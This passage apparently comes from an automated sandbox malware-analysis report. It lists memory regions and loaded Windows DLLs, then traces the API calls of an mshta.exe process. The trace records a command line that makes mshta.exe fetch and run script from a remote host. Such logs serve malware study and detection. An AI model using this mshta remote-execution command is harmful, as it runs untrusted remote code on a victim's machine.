start_va = 0x7fefbf70000
end_va = 0x7fefbf84fff
entry_point = 0x7fefbf760d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 929
start_va = 0x7fffffd4000
end_va = 0x7fffffd5fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 930
start_va = 0x310000
end_va = 0x36ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000310000"
filename = ""
Region:
id = 931
start_va = 0x1f00000
end_va = 0x1ffffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001f00000"
filename = ""
Region:
id = 932
start_va = 0x1f00000
end_va = 0x1f7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001f00000"
filename = ""
Region:
id = 933
start_va = 0x1ff0000
end_va = 0x1ffffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ff0000"
filename = ""
Region:
id = 956
start_va = 0x7fef46d0000
end_va = 0x7fef46d7fff
entry_point = 0x7fef46d1414
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 957
start_va = 0x3080000
end_va = 0x317ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003080000"
filename = ""
Region:
id = 958
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 959
start_va = 0x310000
end_va = 0x34ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000310000"
filename = ""
Region:
id = 960
start_va = 0x360000
end_va = 0x36ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000360000"
filename = ""
Region:
id = 973
start_va = 0x2c60000
end_va = 0x2cdffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c60000"
filename = ""
Region:
id = 974
start_va = 0x2d50000
end_va = 0x2dcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002d50000"
filename = ""
Region:
id = 975
start_va = 0x3300000
end_va = 0x33fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003300000"
filename = ""
Region:
id = 976
start_va = 0x7fef3c70000
end_va = 0x7fef3c7bfff
entry_point = 0x7fef3c7602c
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 977
start_va = 0x7fef6660000
end_va = 0x7fef66d3fff
entry_point = 0x7fef66666f0
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 978
start_va = 0x7fefaf90000
end_va = 0x7fefaf9afff
entry_point = 0x7fefaf912e0
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 979
start_va = 0x7fefafa0000
end_va = 0x7fefafb8fff
entry_point = 0x7fefafa177c
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 980
start_va = 0x7fefafc0000
end_va = 0x7fefafd4fff
entry_point = 0x7fefafc12a0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 981
start_va = 0x7fefbc80000
end_va = 0x7fefbcd2fff
entry_point = 0x7fefbc82b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 982
start_va = 0x7fefc9e0000
end_va = 0x7fefc9e6fff
entry_point = 0x7fefc9e14b0
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 983
start_va = 0x7fefcd40000
end_va = 0x7fefcd86fff
entry_point = 0x7fefcd41064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 984
start_va = 0x7fefcfd0000
end_va = 0x7fefcfd6fff
entry_point = 0x7fefcfd142c
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 985
start_va = 0x7fefcfe0000
end_va = 0x7fefd034fff
entry_point = 0x7fefcfe1054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 986
start_va = 0x7fefd040000
end_va = 0x7fefd056fff
entry_point = 0x7fefd0432b8
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 987
start_va = 0x7fefd730000
end_va = 0x7fefd743fff
entry_point = 0x7fefd7310e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 988
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 1128
start_va = 0x31c0000
end_va = 0x32bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000031c0000"
filename = ""
Region:
id = 1129
start_va = 0x779c0000
end_va = 0x779c2fff
entry_point = 0x779c0000
region_type = mapped_file
name = "normaliz.dll"
filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll")
Region:
id = 1130
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 1133
start_va = 0x3580000
end_va = 0x367ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003580000"
filename = ""
Region:
id = 1134
start_va = 0x7fefbc30000
end_va = 0x7fefbc47fff
entry_point = 0x7fefbc31bf8
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 1135
start_va = 0x7fefbc50000
end_va = 0x7fefbc60fff
entry_point = 0x7fefbc516ac
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 1136
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 1137
start_va = 0x3690000
end_va = 0x378ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003690000"
filename = ""
Region:
id = 1138
start_va = 0x7fef3140000
end_va = 0x7fef314dfff
entry_point = 0x7fef3140000
region_type = mapped_file
name = "msimtf.dll"
filename = "\\Windows\\System32\\msimtf.dll" (normalized: "c:\\windows\\system32\\msimtf.dll")
Region:
id = 1139
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 1146
start_va = 0x2f70000
end_va = 0x306ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f70000"
filename = ""
Region:
id = 1147
start_va = 0x7fef22f0000
end_va = 0x7fef2343fff
entry_point = 0x7fef22f104c
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 1148
start_va = 0x350000
end_va = 0x350fff
entry_point = 0x350000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 1153
start_va = 0x7fefd650000
end_va = 0x7fefd6e0fff
entry_point = 0x7fefd651440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 1154
start_va = 0x570000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000570000"
filename = ""
Region:
id = 1155
start_va = 0x570000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000570000"
filename = ""
Region:
id = 1156
start_va = 0x570000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000570000"
filename = ""
Region:
id = 1158
start_va = 0x7fef2350000
end_va = 0x7fef2f06fff
entry_point = 0x7fef2351bd8
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll")
Region:
id = 1159
start_va = 0x570000
end_va = 0x571fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000570000"
filename = ""
Region:
id = 1173
start_va = 0x580000
end_va = 0x590fff
entry_point = 0x580000
region_type = mapped_file
name = "c_20127.nls"
filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls")
Region:
id = 1174
start_va = 0x3790000
end_va = 0x3b82fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003790000"
filename = ""
Region:
id = 1175
start_va = 0x3ba0000
end_va = 0x3c9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003ba0000"
filename = ""
Region:
id = 1176
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 1178
start_va = 0x7fee0420000
end_va = 0x7fee04b9fff
entry_point = 0x7fee042e1b8
region_type = mapped_file
name = "vbscript.dll"
filename = "\\Windows\\System32\\vbscript.dll" (normalized: "c:\\windows\\system32\\vbscript.dll")
Region:
id = 1224
start_va = 0x7fee52a0000
end_va = 0x7fee52c7fff
entry_point = 0x7fee52a1070
region_type = mapped_file
name = "wshom.ocx"
filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx")
Region:
id = 1225
start_va = 0x7fef9730000
end_va = 0x7fef9747fff
entry_point = 0x7fef9731010
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 1250
start_va = 0x7fee06d0000
end_va = 0x7fee0703fff
entry_point = 0x7fee06d1064
region_type = mapped_file
name = "scrrun.dll"
filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll")
Region:
id = 1251
start_va = 0x5a0000
end_va = 0x5b3fff
entry_point = 0x5a1070
region_type = mapped_file
name = "wshom.ocx"
filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx")
Region:
id = 2333
start_va = 0x5c0000
end_va = 0x5c1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005c0000"
filename = ""
Region:
id = 2334
start_va = 0x6c0000
end_va = 0x6c3fff
entry_point = 0x6c0000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2335
start_va = 0x1f00000
end_va = 0x1f1efff
entry_point = 0x1f00000
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db")
Region:
id = 2336
start_va = 0x1f20000
end_va = 0x1f20fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001f20000"
filename = ""
Region:
id = 2337
start_va = 0x1f30000
end_va = 0x1f5ffff
entry_point = 0x1f30000
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db")
Region:
id = 2338
start_va = 0x1f60000
end_va = 0x1f63fff
entry_point = 0x1f60000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2339
start_va = 0x1f70000
end_va = 0x1fd5fff
entry_point = 0x1f70000
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 2340
start_va = 0x3ca0000
end_va = 0x3d9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003ca0000"
filename = ""
Region:
id = 2341
start_va = 0x7fefc4e0000
end_va = 0x7fefc60bfff
entry_point = 0x7fefc4e94bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 2342
start_va = 0x7fefd9b0000
end_va = 0x7fefd9c9fff
entry_point = 0x7fefd9b1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 2343
start_va = 0x7fefda40000
end_va = 0x7fefda75fff
entry_point = 0x7fefda41474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 2344
start_va = 0x7fefdb70000
end_va = 0x7fefdd46fff
entry_point = 0x7fefdb71010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 2345
start_va = 0x3da0000
end_va = 0x3ffffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003da0000"
filename = ""
Region:
id = 2346
start_va = 0x4000000
end_va = 0x492ffff
entry_point = 0x4000000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Thread:
id = 33
os_tid = 0xbc4
[0062.911] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af950 | out: lpSystemTimeAsFileTime=0x2af950*(dwLowDateTime=0xd590e2b0, dwHighDateTime=0x1d34cee))
[0062.911] GetCurrentProcessId () returned 0xbc0
[0062.911] GetCurrentThreadId () returned 0xbc4
[0062.911] GetTickCount () returned 0x1f0e3
[0062.911] QueryPerformanceCounter (in: lpPerformanceCount=0x2af958 | out: lpPerformanceCount=0x2af958*=478692055) returned 1
[0062.912] GetModuleHandleW (lpModuleName=0x0) returned 0xff9d0000
[0062.912] GetStartupInfoW (in: lpStartupInfo=0x2af7d0 | out: lpStartupInfo=0x2af7d0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0))
[0062.912] GetVersionExW (in: lpVersionInformation=0x2af840*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2af840*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0062.912] HeapSetInformation (HeapHandle=0x6d0000, HeapInformationClass=0x0, HeapInformation=0x2af7a0, HeapInformationLength=0x4) returned 1
[0062.914] HeapSetInformation (HeapHandle=0x6d0000, HeapInformationClass=0x0, HeapInformation=0x2af7a0, HeapInformationLength=0x4) returned 1
[0062.914] GetStartupInfoW (in: lpStartupInfo=0x2af710 | out: lpStartupInfo=0x2af710*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xff9d0000, hStdOutput=0xff9d4214, hStdError=0x6d4ba0))
[0062.914] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
[0062.914] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
[0062.914] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
[0062.914] SetHandleCount (uNumber=0x20) returned 0x20
[0062.914] GetCommandLineA () returned="\"C:\\Windows\\System32\\mshta.exe\" http://www.samyrai777m.p-host.in/t/t.php?thread=0"
[0062.914] GetEnvironmentStringsW () returned 0x387430*
[0062.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1386, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1386
[0062.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1386, lpMultiByteStr=0x6d5590, cbMultiByte=1386, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1386
[0062.915] FreeEnvironmentStringsW (penv=0x387430) returned 1
[0062.915] GetLastError () returned 0x0
[0062.915] SetLastError (dwErrCode=0x0)
[0062.915] GetLastError () returned 0x0
[0062.915] SetLastError (dwErrCode=0x0)
[0062.915] GetLastError () returned 0x0
[0062.915] SetLastError (dwErrCode=0x0)
[0062.915] GetACP () returned 0x4e4
[0062.915] GetLastError () returned 0x0
[0062.915] SetLastError (dwErrCode=0x0)
[0062.915] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2af6a0 | out: lpCPInfo=0x2af6a0) returned 1
[0062.915] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2af140 | out: lpCPInfo=0x2af140) returned 1
[0062.915] GetLastError () returned 0x0
[0062.915] SetLastError (dwErrCode=0x0)
[0062.915] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af160, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0062.915] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af160, cbMultiByte=256, lpWideCharStr=0x2aee40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쥀젦䳮") returned 256
[0062.915] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쥀젦䳮", cchSrc=256, lpCharType=0x2af460 | out: lpCharType=0x2af460) returned 1
[0062.915] GetLastError () returned 0x0
[0062.915] SetLastError (dwErrCode=0x0)
[0062.915] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af160, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0062.915] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af160, cbMultiByte=256, lpWideCharStr=0x2aede0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256
[0062.915] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256
[0062.915] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x2aebd0, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256
[0062.915] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x2af260, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¯\x01", lpUsedDefaultChar=0x0) returned 256
[0062.915] GetLastError () returned 0x0
[0062.915] SetLastError (dwErrCode=0x0)
[0062.915] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af160, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0062.915] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af160, cbMultiByte=256, lpWideCharStr=0x2aede0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256
[0062.915] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256
